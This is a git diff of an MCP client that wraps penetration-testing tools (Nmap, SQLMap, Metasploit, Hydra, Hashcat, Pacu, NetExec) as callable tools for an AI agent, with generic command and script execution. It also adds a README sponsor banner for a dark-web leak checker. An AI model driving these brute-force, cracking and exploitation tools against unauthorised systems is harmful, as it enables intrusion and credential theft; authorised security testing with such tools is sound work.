diff --git a/README.md b/README.md
index f6d4ea0..1911379 100644
--- a/README.md
+++ b/README.md
@@ -36,6 +36,28 @@
+## Official Sponsor
+
+<div align="center">
+
+<b>Sponsored By LeaksAPI - Live Dark Web Data leak checker</b>
+
+<a href="https://leak-check.net">
+  <img src="assets/leaksapi-logo.png" alt="LeaksAPI Logo">
+</a>
+&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+<a href="https://leak-check.net">
+  <img src="assets/leaksapi-banner.png" alt="LeaksAPI Banner">
+</a>
+
+<a href="https://leak-check.net"><b>Visit leak-check.net</b></a>
+
+</div>
+
+---
diff --git a/assets/leaksapi-banner.png b/assets/leaksapi-banner.png
new file mode 100644
index 0000000..4256d7d
Binary files /dev/null and b/assets/leaksapi-banner.png differ
diff --git a/assets/leaksapi-logo.png b/assets/leaksapi-logo.png
new file mode 100644
index 0000000..310cf56
Binary files /dev/null and b/assets/leaksapi-logo.png differ
diff --git a/hexstrike_mcp.py b/hexstrike_mcp.py
index 16ae2f7..23b083b 100644
--- a/hexstrike_mcp.py
+++ b/hexstrike_mcp.py
@@ -30,7 +30,7 @@ from mcp.server.fastmcp import FastMCP
 
 class HexStrikeColors:
     """Enhanced color palette matching the server's ModernVisualEngine.COLORS"""
-    
+
     # Basic colors (for backward compatibility)
     RED = '\033[91m'
     GREEN = '\033[92m'
@@ -39,7 +39,7 @@ class HexStrikeColors:
     MAGENTA = '\033[95m'
     CYAN = '\033[96m'
     WHITE = '\033[97m'
-    
+
     # Core enhanced colors
     MATRIX_GREEN = '\033[38;5;46m'
     NEON_BLUE = '\033[38;5;51m'
@@ -51,7 +51,7 @@ class HexStrikeColors:
     RESET = '\033[0m'
     BOLD = '\033[1m'
     DIM = '\033[2m'
-    
+
     # Enhanced reddish tones and highlighting colors
     BLOOD_RED = '\033[38;5;124m'
     CRIMSON = '\033[38;5;160m'
@@ -61,14 +61,14 @@ class HexStrikeColors:
     BURGUNDY = '\033[38;5;52m'
     SCARLET = '\033[38;5;197m'
     RUBY = '\033[38;5;161m'
-    
+
     # Highlighting colors
     HIGHLIGHT_RED = '\033[48;5;196m\033[38;5;15m'     # Red background, white text
     HIGHLIGHT_YELLOW = '\033[48;5;226m\033[38;5;16m'  # Yellow background, black text
     HIGHLIGHT_GREEN = '\033[48;5;46m\033[38;5;16m'    # Green background, black text
     HIGHLIGHT_BLUE = '\033[48;5;51m\033[38;5;16m'     # Blue background, black text
     HIGHLIGHT_PURPLE = '\033[48;5;129m\033[38;5;15m'  # Purple background, white text
-    
+
     # Status colors with reddish tones
     SUCCESS = '\033[38;5;46m'    # Bright green
     WARNING = '\033[38;5;208m'   # Orange
@@ -76,14 +76,14 @@ class HexStrikeColors:
     CRITICAL = '\033[48;5;196m\033[38;5;15m\033[1m'  # Red background, white bold text
     INFO = '\033[38;5;51m'       # Cyan
     DEBUG = '\033[38;5;240m'     # Gray
-    
+
     # Vulnerability severity colors
     VULN_CRITICAL = '\033[48;5;124m\033[38;5;15m\033[1m'  # Dark red background
     VULN_HIGH = '\033[38;5;196m\033[1m'    # Bright red bold
     VULN_MEDIUM = '\033[38;5;208m\033[1m'  # Orange bold
     VULN_LOW = '\033[38;5;226m'            # Yellow
     VULN_INFO = '\033[38;5;51m'            # Cyan
-    
+
     # Tool status colors
     TOOL_RUNNING = '\033[38;5;46m\033[5m'  # Blinking green
     TOOL_SUCCESS = '\033[38;5;46m\033[1m'  # Bold green
@@ -96,7 +96,7 @@ Colors = HexStrikeColors
 
 class ColoredFormatter(logging.Formatter):
     """Enhanced formatter with colors and emojis for MCP client - matches server styling"""
-    
+
     COLORS = {
         'DEBUG': HexStrikeColors.DEBUG,
         'INFO': HexStrikeColors.SUCCESS,
@@ -104,7 +104,7 @@ class ColoredFormatter(logging.Formatter):
         'ERROR': HexStrikeColors.ERROR,
         'CRITICAL': HexStrikeColors.CRITICAL
     }
-    
+
     EMOJIS = {
         'DEBUG': '🔍',
         'INFO': '✅',
@@ -112,11 +112,11 @@ class ColoredFormatter(logging.Formatter):
         'ERROR': '❌',
         'CRITICAL': '🔥'
     }
-    
+
     def format(self, record):
         emoji = self.EMOJIS.get(record.levelname, '📝')
         color = self.COLORS.get(record.levelname, HexStrikeColors.BRIGHT_WHITE)
-        
+
         # Add color and emoji to the message
         record.msg = f"{color}{emoji} {record.msg}{HexStrikeColors.RESET}"
         return super().format(record)
@@ -146,11 +146,11 @@ MAX_RETRIES = 3  # Maximum number of retries for connection attempts
 
 class HexStrikeClient:
     """Enhanced client for communicating with the HexStrike AI API Server"""
-    
+
     def __init__(self, server_url: str, timeout: int = DEFAULT_REQUEST_TIMEOUT):
         """
         Initialize the HexStrike AI Client
-        
+
         Args:
             server_url: URL of the HexStrike AI API Server
            timeout: Request timeout in seconds
@@ -158,7 +158,7 @@ class HexStrikeClient:
         self.server_url = server_url.rstrip("/")
         self.timeout = timeout
         self.session = requests.Session()
-        
+
         # Try to connect to server with retries
         connected = False
         for i in range(MAX_RETRIES):
@@ -183,20 +183,20 @@ class HexStrikeClient:
             except Exception as e:
                 logger.warning(f"❌ Connection attempt {i+1} failed: {str(e)}")
                 time.sleep(2)  # Wait before retrying
-        
+
         if not connected:
             error_msg = f"Failed to establish connection to HexStrike AI API Server at {server_url} after {MAX_RETRIES} attempts"
             logger.error(error_msg)
             # We'll continue anyway to allow the MCP server to start, but tools will likely fail
-    
+
     def safe_get(self, endpoint: str, params: Optional[Dict[str, Any]] = None) -> Dict[str, Any]:
         """
         Perform a GET request with optional query parameters.
-        
+
         Args:
             endpoint: API endpoint path (without leading slash)
             params: Optional query parameters
-        
+
         Returns:
             Response data as dictionary
         """
@@ -220,16 +220,16 @@ class HexStrikeClient:
     def safe_post(self, endpoint: str, json_data: Dict[str, Any]) -> Dict[str, Any]:
         """
         Perform a POST request with JSON data.
-        
+
         Args:
             endpoint: API endpoint path (without leading slash)
             json_data: JSON data to send
-        
+
         Returns:
             Response data as dictionary
         """
         url = f"{self.server_url}/{endpoint}"
-        
+
         try:
             logger.debug(f"📡 POST {url} with data: {json_data}")
             response = self.session.post(url, json=json_data, timeout=self.timeout)
@@ -245,20 +245,20 @@ class HexStrikeClient:
     def execute_command(self, command: str, use_cache: bool = True) -> Dict[str, Any]:
         """
         Execute a generic command on the HexStrike server
-        
+
         Args:
             command: Command to execute
             use_cache: Whether to use caching for this command
-        
+
         Returns:
             Command execution results
         """
         return self.safe_post("api/command", {"command": command, "use_cache": use_cache})
-    
+
     def check_health(self) -> Dict[str, Any]:
         """
         Check the health of the HexStrike AI API Server
-        
+
         Returns:
             Health status information
         """
@@ -267,30 +267,30 @@ class HexStrikeClient:
 def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     """
     Set up the MCP server with all enhanced tool functions
-    
+
     Args:
         hexstrike_client: Initialized HexStrikeClient
-    
+
     Returns:
         Configured FastMCP instance
     """
     mcp = FastMCP("hexstrike-ai-mcp")
-    
+
     # ============================================================================
     # CORE NETWORK SCANNING TOOLS
     # ============================================================================
-    
+
     @mcp.tool()
     def nmap_scan(target: str, scan_type: str = "-sV", ports: str = "", additional_args: str = "") -> Dict[str, Any]:
         """
         Execute an enhanced Nmap scan against a target with real-time logging.
-        
+
         Args:
             target: The IP address or hostname to scan
             scan_type: Scan type (e.g., -sV for version detection, -sC for scripts)
             ports: Comma-separated list of ports or port ranges
             additional_args: Additional Nmap arguments
-        
+
         Returns:
             Scan results with enhanced telemetry
         """
@@ -301,14 +301,14 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
             "additional_args": additional_args
         }
         logger.info(f"{HexStrikeColors.FIRE_RED}🔍 Initiating Nmap scan: {target}{HexStrikeColors.RESET}")
-        
+
         # Use enhanced error handling by default
         data["use_recovery"] = True
         result = hexstrike_client.safe_post("api/tools/nmap", data)
-        
+
         if result.get("success"):
             logger.info(f"{HexStrikeColors.SUCCESS}✅ Nmap scan completed successfully for {target}{HexStrikeColors.RESET}")
-            
+
             # Check for recovery information
             if result.get("recovery_info", {}).get("recovery_applied"):
                 recovery_info = result["recovery_info"]
@@ -316,24 +316,24 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
                 logger.info(f"{HexStrikeColors.HIGHLIGHT_YELLOW} Recovery applied: {attempts} attempts made {HexStrikeColors.RESET}")
         else:
             logger.error(f"{HexStrikeColors.ERROR}❌ Nmap scan failed for {target}{HexStrikeColors.RESET}")
-            
+
             # Check for human escalation
             if result.get("human_escalation"):
                 logger.error(f"{HexStrikeColors.CRITICAL} HUMAN ESCALATION REQUIRED {HexStrikeColors.RESET}")
-        
+
         return result
 
     @mcp.tool()
     def gobuster_scan(url: str, mode: str = "dir", wordlist: str = "/usr/share/wordlists/dirb/common.txt", additional_args: str = "") -> Dict[str, Any]:
         """
         Execute Gobuster to find directories, DNS subdomains, or virtual hosts with enhanced logging.
-        
+
         Args:
             url: The target URL
             mode: Scan mode (dir, dns, fuzz, vhost)
             wordlist: Path to wordlist file
             additional_args: Additional Gobuster arguments
-        
+
         Returns:
             Scan results with enhanced telemetry
         """
@@ -344,14 +344,14 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
             "additional_args": additional_args
         }
         logger.info(f"{HexStrikeColors.CRIMSON}📁 Starting Gobuster {mode} scan: {url}{HexStrikeColors.RESET}")
-        
+
         # Use enhanced error handling by default
         data["use_recovery"] = True
         result = hexstrike_client.safe_post("api/tools/gobuster", data)
-        
+
         if result.get("success"):
             logger.info(f"{HexStrikeColors.SUCCESS}✅ Gobuster scan completed for {url}{HexStrikeColors.RESET}")
-            
+
             # Check for recovery information
             if result.get("recovery_info", {}).get("recovery_applied"):
                 recovery_info = result["recovery_info"]
@@ -359,26 +359,26 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
                 logger.info(f"{HexStrikeColors.HIGHLIGHT_YELLOW} Recovery applied: {attempts} attempts made {HexStrikeColors.RESET}")
         else:
             logger.error(f"{HexStrikeColors.ERROR}❌ Gobuster scan failed for {url}{HexStrikeColors.RESET}")
-            
+
             # Check for alternative tool suggestion
             if result.get("alternative_tool_suggested"):
                 alt_tool = result["alternative_tool_suggested"]
                 logger.info(f"{HexStrikeColors.HIGHLIGHT_BLUE} Alternative tool suggested: {alt_tool} {HexStrikeColors.RESET}")
-        
+
         return result
 
     @mcp.tool()
     def nuclei_scan(target: str, severity: str = "", tags: str = "", template: str = "", additional_args: str = "") -> Dict[str, Any]:
         """
         Execute Nuclei vulnerability scanner with enhanced logging and real-time progress.
-        
+
         Args:
             target: The target URL or IP
             severity: Filter by severity (critical,high,medium,low,info)
             tags: Filter by tags (e.g. cve,rce,lfi)
             template: Custom template path
             additional_args: Additional Nuclei arguments
-        
+
         Returns:
             Scan results with discovered vulnerabilities and telemetry
         """
@@ -390,20 +390,20 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
             "additional_args": additional_args
         }
         logger.info(f"{HexStrikeColors.BLOOD_RED}🔬 Starting Nuclei vulnerability scan: {target}{HexStrikeColors.RESET}")
-        
+
         # Use enhanced error handling by default
         data["use_recovery"] = True
         result = hexstrike_client.safe_post("api/tools/nuclei", data)
-        
+
         if result.get("success"):
             logger.info(f"{HexStrikeColors.SUCCESS}✅ Nuclei scan completed for {target}{HexStrikeColors.RESET}")
-            
+
             # Enhanced vulnerability reporting
             if result.get("stdout") and "CRITICAL" in result["stdout"]:
                 logger.warning(f"{HexStrikeColors.CRITICAL} CRITICAL vulnerabilities detected! {HexStrikeColors.RESET}")
             elif result.get("stdout") and "HIGH" in result["stdout"]:
                 logger.warning(f"{HexStrikeColors.FIRE_RED} HIGH severity vulnerabilities found! {HexStrikeColors.RESET}")
-            
+
             # Check for recovery information
             if result.get("recovery_info", {}).get("recovery_applied"):
                 recovery_info = result["recovery_info"]
@@ -411,18 +411,18 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
                 logger.info(f"{HexStrikeColors.HIGHLIGHT_YELLOW} Recovery applied: {attempts} attempts made {HexStrikeColors.RESET}")
         else:
             logger.error(f"{HexStrikeColors.ERROR}❌ Nuclei scan failed for {target}{HexStrikeColors.RESET}")
-        
+
         return result
 
     # ============================================================================
     # CLOUD SECURITY TOOLS
     # ============================================================================
-    
+
     @mcp.tool()
     def prowler_scan(provider: str = "aws", profile: str = "default", region: str = "", checks: str = "", output_dir: str = "/tmp/prowler_output", output_format: str = "json", additional_args: str = "") -> Dict[str, Any]:
         """
         Execute Prowler for comprehensive cloud security assessment.
-        
+
         Args:
             provider: Cloud provider (aws, azure, gcp)
             profile: AWS profile to use
@@ -431,7 +431,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
             output_dir: Directory to save results
             output_format: Output format (json, csv, html)
             additional_args: Additional Prowler arguments
-        
+
         Returns:
             Cloud security assessment results
         """
@@ -456,7 +456,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     def trivy_scan(scan_type: str = "image", target: str = "", output_format: str = "json", severity: str = "", output_file: str = "", additional_args: str = "") -> Dict[str, Any]:
         """
         Execute Trivy for container and filesystem vulnerability scanning.
-        
+
         Args:
             scan_type: Type of scan (image, fs, repo, config)
             target: Target to scan (image name, directory, repository)
@@ -464,7 +464,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
             severity: Severity filter (UNKNOWN,LOW,MEDIUM,HIGH,CRITICAL)
             output_file: File to save results
             additional_args: Additional Trivy arguments
-        
+
         Returns:
             Vulnerability scan results
         """
@@ -489,12 +489,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     # ============================================================================
 
     @mcp.tool()
-    def scout_suite_assessment(provider: str = "aws", profile: str = "default", 
-                              report_dir: str = "/tmp/scout-suite", services: str = "", 
+    def scout_suite_assessment(provider: str = "aws", profile: str = "default",
+                              report_dir: str = "/tmp/scout-suite", services: str = "",
                               exceptions: str = "", additional_args: str = "") -> Dict[str, Any]:
         """
         Execute Scout Suite for multi-cloud security assessment.
-        
+
         Args:
             provider: Cloud provider (aws, azure, gcp, aliyun, oci)
             profile: AWS profile to use
@@ -502,7 +502,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
             services: Specific services to assess
             exceptions: Exceptions file path
             additional_args: Additional Scout Suite arguments
-        
+
         Returns:
             Multi-cloud security assessment results
         """
@@ -523,17 +523,17 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
         return result
 
     @mcp.tool()
-    def cloudmapper_analysis(action: str = "collect", account: str = "", 
+    def cloudmapper_analysis(action: str = "collect", account: str = "",
                             config: str = "config.json", additional_args: str = "") -> Dict[str, Any]:
         """
         Execute CloudMapper for AWS network visualization and security analysis.
-        
+
         Args:
             action: Action to perform (collect, prepare, webserver, find_admins, etc.)
             account: AWS account to analyze
             config: Configuration file path
             additional_args: Additional CloudMapper arguments
-        
+
         Returns:
             AWS network visualization and security analysis results
         """
@@ -552,19 +552,19 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
         return result
 
     @mcp.tool()
-    def pacu_exploitation(session_name: str = "hexstrike_session", modules: str = "", 
-                         data_services: str = "", regions: str = "", 
+    def pacu_exploitation(session_name: str = "hexstrike_session", modules: str = "",
+                         data_services: str = "", regions: str = "",
                          additional_args: str = "") -> Dict[str, Any]:
         """
         Execute Pacu for AWS exploitation framework.
-        
+
         Args:
             session_name: Pacu session name
             modules: Comma-separated list of modules to run
             data_services: Data services to enumerate
             regions: AWS regions to target
             additional_args: Additional Pacu arguments
-        
+
         Returns:
             AWS exploitation framework results
         """
@@ -584,12 +584,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
         return result
 
     @mcp.tool()
-    def kube_hunter_scan(target: str = "", remote: str = "", cidr: str = "", 
-                        interface: str = "", active: bool = False, report: str = "json", 
+    def kube_hunter_scan(target: str = "", remote: str = "", cidr: str = "",
+                        interface: str = "", active: bool = False, report: str = "json",
                         additional_args: str = "") -> Dict[str, Any]:
         """
         Execute kube-hunter for Kubernetes penetration testing.
-        
+
         Args:
             target: Specific target to scan
             remote: Remote target to scan
@@ -598,7 +598,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
             active: Enable active hunting (potentially harmful)
             report: Report format (json, yaml)
             additional_args: Additional kube-hunter arguments
-        
+
         Returns:
             Kubernetes penetration testing results
         """
@@ -620,18 +620,18 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
         return result
 
     @mcp.tool()
-    def kube_bench_cis(targets: str = "", version: str = "", config_dir: str = "", 
+    def kube_bench_cis(targets: str = "", version: str = "", config_dir: str = "",
                       output_format: str = "json", additional_args: str = "") -> Dict[str, Any]:
         """
         Execute kube-bench for CIS Kubernetes benchmark checks.
-        
+
         Args:
             targets: Targets to check (master, node, etcd, policies)
             version: Kubernetes version
             config_dir: Configuration directory
             output_format: Output format (json, yaml)
             additional_args: Additional kube-bench arguments
-        
+
         Returns:
             CIS Kubernetes benchmark results
         """
@@ -651,18 +651,18 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
         return result
 
     @mcp.tool()
-    def docker_bench_security_scan(checks: str = "", exclude: str = "", 
-                                  output_file: str = "/tmp/docker-bench-results.json", 
+    def docker_bench_security_scan(checks: str = "", exclude: str = "",
                                  output_file: str = "/tmp/docker-bench-results.json",
                                   additional_args: str = "") -> Dict[str, Any]:
         """
         Execute Docker Bench for Security for Docker security assessment.
-        
+
         Args:
             checks: Specific checks to run
             exclude: Checks to exclude
             output_file: Output file path
             additional_args: Additional Docker Bench arguments
-        
+
         Returns:
             Docker security assessment results
         """
@@ -681,17 +681,17 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
         return result
 
     @mcp.tool()
-    def clair_vulnerability_scan(image: str, config: str = "/etc/clair/config.yaml", 
+    def clair_vulnerability_scan(image: str, config: str = "/etc/clair/config.yaml",
                                 output_format: str = "json", additional_args: str = "") -> Dict[str, Any]:
         """
         Execute Clair for container vulnerability analysis.
-        
+
         Args:
             image: Container image to scan
             config: Clair configuration file
             output_format: Output format (json, yaml)
             additional_args: Additional Clair arguments
-        
+
         Returns:
             Container vulnerability analysis results
         """
@@ -710,19 +710,19 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
         return result
 
     @mcp.tool()
-    def falco_runtime_monitoring(config_file: str = "/etc/falco/falco.yaml", 
-                                rules_file: str = "", output_format: str = "json", 
+    def falco_runtime_monitoring(config_file: str = "/etc/falco/falco.yaml",
                                rules_file: str = "", output_format: str = "json",
                                 duration: int = 60, additional_args: str = "") -> Dict[str, Any]:
         """
         Execute Falco for runtime security monitoring.
-        
+
         Args:
             config_file: Falco configuration file
             rules_file: Custom rules file
             output_format: Output format (json, text)
             duration: Monitoring duration in seconds
             additional_args: Additional Falco arguments
-        
+
         Returns:
             Runtime security monitoring results
         """
@@ -742,12 +742,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
         return result
 
     @mcp.tool()
-    def checkov_iac_scan(directory: str = ".", framework: str = "", check: str = "", 
-                        skip_check: str = "", output_format: str = "json", 
+    def checkov_iac_scan(directory: str = ".", framework: str = "", check: str = "",
                        skip_check: str = "", output_format: str = "json",
                         additional_args: str = "") -> Dict[str, Any]:
         """
         Execute Checkov for infrastructure as code security scanning.
-        
+
         Args:
             directory: Directory to scan
             framework: Framework to scan (terraform, cloudformation, kubernetes, etc.)
@@ -755,7 +755,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
             skip_check: Check to skip
             output_format: Output format (json, yaml, cli)
             additional_args: Additional Checkov arguments
-        
+
         Returns:
             Infrastructure as code security scanning results
         """
@@ -776,12 +776,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
         return result
 
     @mcp.tool()
-    def terrascan_iac_scan(scan_type: str = "all", iac_dir: str = ".", 
-                          policy_type: str = "", output_format: str = "json", 
+    def terrascan_iac_scan(scan_type: str = "all", iac_dir: str = ".",
                          policy_type: str = "", output_format: str = "json",
                           severity: str = "", additional_args: str = "") -> Dict[str, Any]:
         """
         Execute Terrascan for infrastructure as code security scanning.
-        
+
         Args:
             scan_type: Type of scan (all, terraform, k8s, etc.)
             iac_dir: Infrastructure as code directory
@@ -789,7 +789,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
             output_format: Output format (json, yaml, xml)
             severity: Severity filter (high, medium, low)
             additional_args: Additional Terrascan arguments
-        
+
         Returns:
             Infrastructure as code security scanning results
         """
@@ -812,17 +812,17 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     # ============================================================================
     # FILE OPERATIONS & PAYLOAD GENERATION
     # ============================================================================
-    
+
     @mcp.tool()
     def create_file(filename: str, content: str, binary: bool = False) -> Dict[str, Any]:
         """
         Create a file with specified content on the HexStrike server.
-        
+
         Args:
             filename: Name of the file to create
             content: Content to write to the file
             binary: Whether the content is binary data
-        
+
         Returns:
             File creation results
         """
@@ -843,12 +843,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     def modify_file(filename: str, content: str, append: bool = False) -> Dict[str, Any]:
         """
         Modify an existing file on the HexStrike server.
-        
+
         Args:
             filename: Name of the file to modify
             content: Content to write or append
             append: Whether to append to the file (True) or overwrite (False)
-        
+
         Returns:
             File modification results
         """
@@ -869,10 +869,10 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     def delete_file(filename: str) -> Dict[str, Any]:
         """
         Delete a file or directory on the HexStrike server.
-        
+
         Args:
             filename: Name of the file or directory to delete
-        
+
         Returns:
             File deletion results
         """
@@ -891,10 +891,10 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     def list_files(directory: str = ".") -> Dict[str, Any]:
         """
         List files in a directory on the HexStrike server.
-        
+
         Args:
             directory: Directory to list (relative to server's base directory)
-        
+
         Returns:
             Directory listing results
         """
@@ -911,13 +911,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     def generate_payload(payload_type: str = "buffer", size: int = 1024, pattern: str = "A", filename: str = "") -> Dict[str, Any]:
         """
         Generate large payloads for testing and exploitation.
-        
+
         Args:
             payload_type: Type of payload (buffer, cyclic, random)
             size: Size of the payload in bytes
             pattern: Pattern to use for buffer payloads
             filename: Custom filename (auto-generated if empty)
-        
+
         Returns:
             Payload generation results
         """
@@ -928,7 +928,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
         }
         if filename:
             data["filename"] = filename
-        
+
         logger.info(f"🎯 Generating {payload_type} payload: {size} bytes")
         result = hexstrike_client.safe_post("api/payloads/generate", data)
         if result.get("success"):
@@ -940,16 +940,16 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     # ============================================================================
     # PYTHON ENVIRONMENT MANAGEMENT
    # ============================================================================
-    
+
     @mcp.tool()
     def install_python_package(package: str, env_name: str = "default") -> Dict[str, Any]:
         """
         Install a Python package in a virtual environment on the HexStrike server.
-        
+
         Args:
             package: Name of the Python package to install
             env_name: Name of the virtual environment
-        
+
         Returns:
             Package installation results
         """
@@ -969,12 +969,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     def execute_python_script(script: str, env_name: str = "default", filename: str = "") -> Dict[str, Any]:
         """
         Execute a Python script in a virtual environment on the HexStrike server.
-        
+
         Args:
             script: Python script content to execute
             env_name: Name of the virtual environment
             filename: Custom script filename (auto-generated if empty)
-        
+
         Returns:
             Script execution results
         """
@@ -984,7 +984,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
         }
         if filename:
             data["filename"] = filename
-        
+
         logger.info(f"🐍 Executing Python script in env {env_name}")
         result = hexstrike_client.safe_post("api/python/execute", data)
         if result.get("success"):
@@ -1001,12 +1001,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     def dirb_scan(url: str, wordlist: str = "/usr/share/wordlists/dirb/common.txt", additional_args: str = "") -> Dict[str, Any]:
         """
         Execute Dirb for directory brute forcing with enhanced logging.
-        
+
         Args:
             url: The target URL
             wordlist: Path to wordlist file
             additional_args: Additional Dirb arguments
-        
+
         Returns:
             Scan results with enhanced telemetry
         """
@@ -1027,11 +1027,11 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     def nikto_scan(target: str, additional_args: str = "") -> Dict[str, Any]:
         """
         Execute Nikto web vulnerability scanner with enhanced logging.
-        
+
         Args:
             target: The target URL or IP
             additional_args: Additional Nikto arguments
-        
+
         Returns:
             Scan results with discovered vulnerabilities
         """
@@ -1051,12 +1051,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     def sqlmap_scan(url: str, data: str = "", additional_args: str = "") -> Dict[str, Any]:
         """
         Execute SQLMap for SQL injection testing with enhanced logging.
-        
+
         Args:
             url: The target URL
             data: POST data for testing
             additional_args: Additional SQLMap arguments
-        
+
         Returns:
             SQL injection test results
         """
@@ -1077,11 +1077,11 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     def metasploit_run(module: str, options: Dict[str, Any] = {}) -> Dict[str, Any]:
         """
         Execute a Metasploit module with enhanced logging.
-        
+
         Args:
             module: The Metasploit module to use
             options: Dictionary of module options
-        
+
         Returns:
             Metasploit execution results
         """
@@ -1109,7 +1109,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     ) -> Dict[str, Any]:
         """
         Execute Hydra for password brute forcing with enhanced logging.
-        
+
         Args:
             target: The target IP or hostname
             service: The service to attack (ssh, ftp, http, etc.)
@@ -1118,7 +1118,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
             password: Single password to test
             password_file: File containing passwords
             additional_args: Additional Hydra arguments
-        
+
         Returns:
             Brute force attack results
         """
@@ -1148,13 +1148,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     ) -> Dict[str, Any]:
         """
         Execute John the Ripper for password cracking with enhanced logging.
-        
+
         Args:
             hash_file: File containing password hashes
             wordlist: Wordlist file to use
             format_type: Hash format type
             additional_args: Additional John arguments
-        
+
         Returns:
             Password cracking results
         """
@@ -1176,11 +1176,11 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     def wpscan_analyze(url: str, additional_args: str = "") -> Dict[str, Any]:
         """
         Execute WPScan for WordPress vulnerability scanning with enhanced logging.
-        
+
         Args:
             url: The WordPress site URL
             additional_args: Additional WPScan arguments
-        
+
         Returns:
             WordPress vulnerability scan results
         """
@@ -1200,11 +1200,11 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     def enum4linux_scan(target: str, additional_args: str = "-a") -> Dict[str, Any]:
         """
         Execute Enum4linux for SMB enumeration with enhanced logging.
-        
+
         Args:
             target: The target IP address
             additional_args: Additional Enum4linux arguments
-        
+
         Returns:
             SMB enumeration results
         """
@@ -1224,14 +1224,14 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     def ffuf_scan(url: str, wordlist: str = "/usr/share/wordlists/dirb/common.txt", mode: str = "directory", match_codes: str = "200,204,301,302,307,401,403", additional_args: str = "") -> Dict[str, Any]:
         """
         Execute FFuf for web fuzzing with enhanced logging.
-        
+
         Args:
             url: The target URL
             wordlist: Wordlist file to use
             mode: Fuzzing mode (directory, vhost, parameter)
             match_codes: HTTP status codes to match
             additional_args: Additional FFuf arguments
-        
+
         Returns:
             Web fuzzing results
         """
@@ -1254,7 +1254,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     def netexec_scan(target: str, protocol: str = "smb", username: str = "", password: str = "", hash_value: str = "", module: str = "", additional_args: str = "") -> Dict[str, Any]:
         """
         Execute NetExec (formerly CrackMapExec) for network enumeration with enhanced logging.
-        
+
         Args:
             target: The target IP or network
             protocol: Protocol to use (smb, ssh, winrm, etc.)
@@ -1263,7 +1263,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
             hash_value: Hash for pass-the-hash attacks
             module: NetExec module to execute
             additional_args: Additional NetExec arguments
-        
+
         Returns:
             Network enumeration results
         """
@@ -1288,12 +1288,12 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     def amass_scan(domain: str, mode: str = "enum", additional_args: str = "") -> Dict[str, Any]:
         """
         Execute Amass for subdomain enumeration with enhanced logging.
-        
+
         Args:
             domain: The target domain
             mode: Amass mode (enum, intel, viz)
             additional_args: Additional Amass arguments
-        
+
         Returns:
             Subdomain enumeration results
         """
@@ -1314,7 +1314,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
     def hashcat_crack(hash_file: str, hash_type: str, attack_mode: str = "0", wordlist: str = "/usr/share/wordlists/rockyou.txt", mask: str = "", additional_args: str = "") -> Dict[str, Any]:
         """
         Execute Hashcat for advanced password cracking with enhanced logging.
-        
+
         Args:
             hash_file: File containing password hashes
             hash_type: Hash type number for Hashcat
@@ -1322,7 +1322,7 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
             wordlist: Wordlist file for dictionary attacks
             mask: Mask for mask attacks
             additional_args: Additional Hashcat arguments
-        
+
         Returns:
             Password cracking results
         """
@@ -1346,13 +1346,13 @@ def setup_mcp_server(hexstrike_client: HexStrikeClient) -> FastMCP:
